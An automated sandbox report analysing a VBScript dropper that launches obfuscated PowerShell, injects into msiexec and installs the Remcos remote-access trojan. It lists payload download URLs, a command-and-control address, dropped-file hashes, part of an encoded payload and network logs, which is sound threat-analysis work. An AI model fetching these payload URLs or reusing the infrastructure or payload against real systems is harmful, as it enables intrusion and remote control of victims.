Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | 113 Application Layer Protocol | Data Transfer Size Limits | Service Stop

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1576526
Sample: Sublabially.vbs
Startdate: 17/12/2024
Architecture: WINDOWS
Score: 100

Start
  DNS: ig2c.icu
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
  • wscript.exe (started)
    Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
    • powershell.exe (started by wscript.exe)
      Network: ig2c.icu 172.67.210.11, 443, 49717, 49815 CLOUDFLARENETUS United States
      Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
      • conhost.exe (started)
  • powershell.exe (started)
    Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
    • msiexec.exe (started)
      Network: 154.216.18.216, 2404, 49826, 49877 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles
      Signatures: Detected Remcos RAT
    • conhost.exe (started)

Source | Detection | Scanner
Sublabially.vbs | 11% | Virustotal
Sublabially.vbs | 3% | ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://ig2c.icu | 0% | Avira URL Cloud | safe
https://ig2c.icu/JvCarekj/NywxkpRVdifOOuG4.bin | 0% | Avira URL Cloud | safe
https://ig2c.icu | 0% | Avira URL Cloud | safe
https://ig2c.icu/ZtySvRyz/Blusterer.deploy | 0% | Avira URL Cloud | safe
https://ig2c.icu/ | 0% | Avira URL Cloud | safe
http://crl.microsoftz | 0% | Avira URL Cloud | safe
https://ig2c.icu/ZtySvRyz/Blusterer.deployP | 0% | Avira URL Cloud | safe
https://ig2c.icu/ZtySvRyz/Blusterer.deployXRml | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ig2c.icu | 172.67.210.11 | true | false | | unknown
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://ig2c.icu/JvCarekj/NywxkpRVdifOOuG4.bin | false | Avira URL Cloud: safe | unknown
https://ig2c.icu/ZtySvRyz/Blusterer.deploy | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://ig2c.icu | powershell.exe, 00000002.00000002.1504759097.000002485A4EB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.1714950022.0000000004921000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ig2c.icu | powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1504759097.000002485A494000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.microsoft | powershell.exe, 00000002.00000002.1503719868.0000024856CD5000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.1504759097.0000024859440000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ig2c.icu/ | msiexec.exe, 00000007.00000002.2649817843.0000000006C2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ig2c.icu/ZtySvRyz/Blusterer.deployXRml | powershell.exe, 00000005.00000002.1714950022.0000000004A76000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1504759097.0000024858861000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoftz | powershell.exe, 00000005.00000002.1741174353.0000000007202000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ig2c.icu/ZtySvRyz/Blusterer.deployP | powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1504759097.0000024858861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1714950022.0000000004921000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
154.216.18.216 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | true
172.67.210.11 | ig2c.icu | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576526
Start date and time: 2024-12-17 08:28:33 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Sublabially.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@8/7@1/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 67
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7536 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7824 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:29:26 | API Interceptor | 82x Sleep call for process: powershell.exe modified
02:30:55 | API Interceptor | 284976x Sleep call for process: msiexec.exe modified
Associated Sample Name / URL | Detection | Threat Name | Context

Match: 154.216.18.216
Strait STS.vbs | malicious | Remcos, GuLoader |
DT RDU KDFT0089.exe | malicious | Remcos |

Match: s-part-0035.t-0009.t-msedge.net
#U041e#U043f#U043b#U0430#U0442#U0430.xls | malicious | Unknown | 13.107.246.63
fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 13.107.246.63
https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637 | malicious | Unknown | 13.107.246.63
#U041e#U043f#U043b#U0430#U0442#U0430.xls | malicious | Unknown | 13.107.246.63
Quas_Brout_ncrypt.exe | malicious | Quasar | 13.107.246.63
Client-built.exe | malicious | Quasar | 13.107.246.63
wayneenterprisesbatcave-6.0.1901-windows-installer.msi | malicious | ScreenConnect Tool | 13.107.246.63
bad.html | malicious | HTMLPhisher | 13.107.246.63
Yogi Tea Benefits Open Enrollment.eml | malicious | HTMLPhisher | 13.107.246.63
http://inspirafinancial.com | malicious | Unknown | 13.107.246.63

Match: CLOUDFLARENETUS
Brokerage Invoice.pdf.vbs | malicious | Unknown | 104.21.2.70
DHL.exe | malicious | FormBook | 104.21.48.233
SFHgtxFGtB.ps1 | malicious | Unknown | 104.21.87.65
DG55Gu1yGM.exe | malicious | LummaC | 104.21.56.70
he55PbvM2G.exe | malicious | LummaC | 104.21.56.70
fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 104.21.87.65
1iC0WTxgUf.exe | malicious | Unknown | 104.18.0.75
Instruction_695-18112-002_Rev.PDF.lnk.d.lnk | malicious | Unknown | 104.21.83.229
https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637 | malicious | Unknown | 104.17.25.14
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | malicious | Cobalt Strike, Remcos | 104.21.84.67

Match: SKHT-ASShenzhenKatherineHengTechnologyInformationCo
ZppxPm0ASs.exe | malicious | Xmrig | 154.216.20.243
RUN.VBS.vbs | malicious | Unknown | 154.216.18.89
arm4.elf | malicious | Mirai | 156.230.19.168
h.html | malicious | Unknown | 154.216.18.69
invoice.html | malicious | Unknown | 154.216.18.89
Arrival Notice.vbs | malicious | Remcos, GuLoader | 154.216.17.190
1734335488857ad04f18b89ed443298ec4ba194986b75012687d1a4e65fb772a035ff002b3927.dat-decoded.exe | malicious | XWorm | 154.216.17.204
17343353665dbf331bb34348160d07a40652276a18d932b7a75cefa9161a74f0bd5e08d97f649.dat-decoded.exe | malicious | Remcos | 154.216.17.204
file.exe | malicious | Amadey, LummaC Stealer, Vidar, Xmrig | 154.216.20.243
arm6.elf | malicious | Unknown | 154.211.34.28

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Brokerage Invoice.pdf.vbs | malicious | Unknown | 172.67.210.11
Nueva orden de compra-836528268278278.xlsx.exe | malicious | Unknown | 172.67.210.11
Order129845.exe | malicious | AgentTesla | 172.67.210.11
SFHgtxFGtB.ps1 | malicious | Unknown | 172.67.210.11
Nueva orden de compra-836528268278278.xlsx.exe | malicious | Unknown | 172.67.210.11
fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 172.67.210.11
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | malicious | Cobalt Strike, Remcos | 172.67.210.11
sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta | malicious | Cobalt Strike, Remcos | 172.67.210.11
createdbetterthingswithgreatnressgivenmebackwithnice.hta | malicious | Cobalt Strike, FormBook | 172.67.210.11
PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 172.67.210.11
37f463bf4616ecd445d4a1937da06e1969633f.msi | malicious | Vidar | 172.67.210.11
DG55Gu1yGM.exe | malicious | LummaC | 172.67.210.11
he55PbvM2G.exe | malicious | LummaC | 172.67.210.11
fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 172.67.210.11
1iC0WTxgUf.exe | malicious | Unknown | 172.67.210.11
Instruction_695-18112-002_Rev.PDF.lnk.d.lnk | malicious | Unknown | 172.67.210.11
PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 172.67.210.11
file.exe | malicious | ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig | 172.67.210.11
Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.210.11
ME-SPC-94.03.60.175.07.exe | malicious | GuLoader | 172.67.210.11
                                                No context
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):11608
                                                Entropy (8bit):4.8908305915084105
                                                Encrypted:false
                                                SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:@...e................................................@..........
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):456836
                                                Entropy (8bit):5.951290971765033
                                                Encrypted:false
                                                SSDEEP:6144:UMKTpE6KHIBEndNyd0otjif1knn2D3RbOhwBQhR4O9TRVRgz9Bx1rsYm0L/8TWW:UMKNJecEndNydSY6B6hwuhdxKLGw9W
                                                MD5:1760AB55A280B98972A4B447F81D684F
                                                SHA1:B34D4CC6C0AE3400166786B3021DBAC19DB9A0E0
                                                SHA-256:EEE690FD285D62217727506E3099BCDF98E048C521A24375F912DAD3B4700F0B
                                                SHA-512:2B62055C145F874276272090296831F79DEB1361F92F24864A8B01CCB41AEBC056DD071D7E1C0F5862DF4CEFEFF5731105AB4DCAAE9D4CEF8E2E8C6599376F37
                                                Malicious:false
                                                Preview:6wLbgnEBm7to+xkAcQGbcQGbA1wkBOsC3gzrAo8iuU7nRVhxAZtxAZuB8QyQNvvrAvCt6wLHrIHxQndzo3EBm+sCBUBxAZvrAhENuvDd2t1xAZtxAZvrAg8/6wLhsDHKcQGb6wK5i4kUC+sCZhtxAZvR4nEBm+sCH56DwQTrAmO8cQGbgflYN1QCfMpxAZtxAZuLRCQEcQGbcQGbicPrAgENcQGbgcPLsjIBcQGb6wIrsLqJsai8cQGb6wIJhoHyuUgdgXEBm3EBm4HqMPm1PesC6AZxAZtxAZtxAZtxAZtxAZuLDBDrAm2Z6wJtiYkME3EBm3EBm0JxAZtxAZuB+jzFBAB11+sCL/frArA1iVwkDHEBm3EBm4HtAAMAAOsCxMDrAsuFi1QkCHEBm+sCrx6LfCQEcQGb6wIQv4nrcQGb6wIa+4HDnAAAAOsC8YxxAZtT6wLZwusC21pqQHEBm3EBm4nrcQGbcQGbx4MAAQAAAEBxAusC8XjrAgXtgcMAAQAA6wKVg3EBm1NxAZvrAo+4ievrApgxcQGbibsEAQAA6wK0NnEBm4HDBAEAAHEBm3EBm1NxAZtxAZtq/3EBm3EBm4PCBXEBm3EBmzH26wJAjusCDyMxyesCiTdxAZuLGnEBm+sC82VBcQGbcQGbORwKdfRxAZtxAZtG6wIAfOsC0ISAfAr7uHXecQGbcQGbi0QK/HEBm3EBmynwcQGbcQGb/9LrAtVCcQGbujzFBADrArshcQGbMcDrAqAqcQGbi3wkDOsC0UJxAZuBNAeeHJelcQGb6wIOA4PABHEBm+sCe1E50HXkcQGb6wKP6In7cQGbcQGb/9frAsM56wIKLafEf6eeHJecVpho/qbFxx3OZLaho/eXpZ4TE+MsGJf9F/ke2C+jnHgK/RZSNjbz4x/rE/NVURZKuYKsT7fgHNgvSfGcR5VyHKguXvEf9cuafUUWTE5ETlkf9WU8kuJQ4ZMcoLsrWRbhkxywCbvd
                                                File type:ASCII text, with very long lines (354), with CRLF line terminators
                                                Entropy (8bit):5.0242713348497965
                                                TrID:
                                                  File name:Sublabially.vbs
                                                  File size:47'800 bytes
                                                  MD5:c4189a98b8eda94cb6632e57fe824155
                                                  SHA1:0455b4277f9ad2e1ed9d6349c9459a843ddf5dff
                                                  SHA256:9ab13f3f467c2ee1421b70d642789f7ee63bdf94841bd612e5ffa44c041a9a45
                                                  SHA512:510ee5434ce30929c435fbfbc113d7d6549a08961ffe3e52f0dd354cc5f76fd38bf741260b5fef15582f892cad891da56fe9db114a71a326bd5f665faa298d55
                                                  SSDEEP:768:DUjonk+CRK4ItAdI5ll04OLUjK+64dfChihLRJI8Z9z2Ano9uKFgS:Deok/VdI5l6RLUiCDLqA7AJ
                                                  TLSH:D9232A67EF24066B8DCE2659FD645F86C97CC401412739F5BEED038E904A89CE3BE219
                                                  File Content Preview:..'hyphenation! attraperedes; phellum,..'Koghedt goombah. turntail, teoretisafr...'Oversupplied swayers pelsjgernes nonmoderateness;..'Trkkanals listigstes, lymphosarcomas: headachier?..'Nave, egrets?....'Hyggespreders, respelled..'Unexcitableness! supers
                                                  Icon Hash:68d69b8f86ab9a86
                                                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                  2024-12-17T08:29:21.022618+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49973 | 154.216.18.216 | 2404 | TCP
                                                  2024-12-17T08:30:17.833317+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49815 | 172.67.210.11 | 443 | TCP
                                                  2024-12-17T08:30:42.265024+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49826 | 154.216.18.216 | 2404 | TCP
                                                  2024-12-17T08:31:05.313531+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49877 | 154.216.18.216 | 2404 | TCP
                                                  2024-12-17T08:31:28.343680+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49925 | 154.216.18.216 | 2404 | TCP
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Dec 17, 2024 08:29:34.583673954 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.595263958 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.595405102 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.602077961 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.602166891 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.694601059 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.694700956 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.707712889 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.707777977 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.714562893 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.714629889 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.721060038 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.721112967 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.832540989 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.832551003 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.832576036 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.832603931 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.832633018 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.832644939 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.882910013 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.949928999 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.949939966 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.949969053 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.949980974 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.950021982 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.950043917 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.950058937 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.991348028 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.067583084 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.067600012 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.067616940 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.067648888 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.067677021 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.067687988 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.116374969 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.188152075 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188168049 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188205004 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188251019 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188266039 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.188296080 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188309908 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.241360903 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.633153915 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.633172035 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.633241892 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.751709938 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.751727104 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.751847982 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.875062943 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.875077963 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.875210047 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.177263021 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.177414894 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.297544956 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297560930 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297570944 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297581911 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297615051 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297825098 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.297854900 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297867060 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297878027 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.297883987 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297919989 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297924042 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.298466921 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.346893072 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.346908092 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.346936941 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.347026110 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.347057104 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.347142935 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.917941093 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918035984 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.918086052 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918107986 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918148041 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.918469906 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918551922 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.918565035 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918584108 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918623924 CET49717443192.168.2.9172.67.210.11
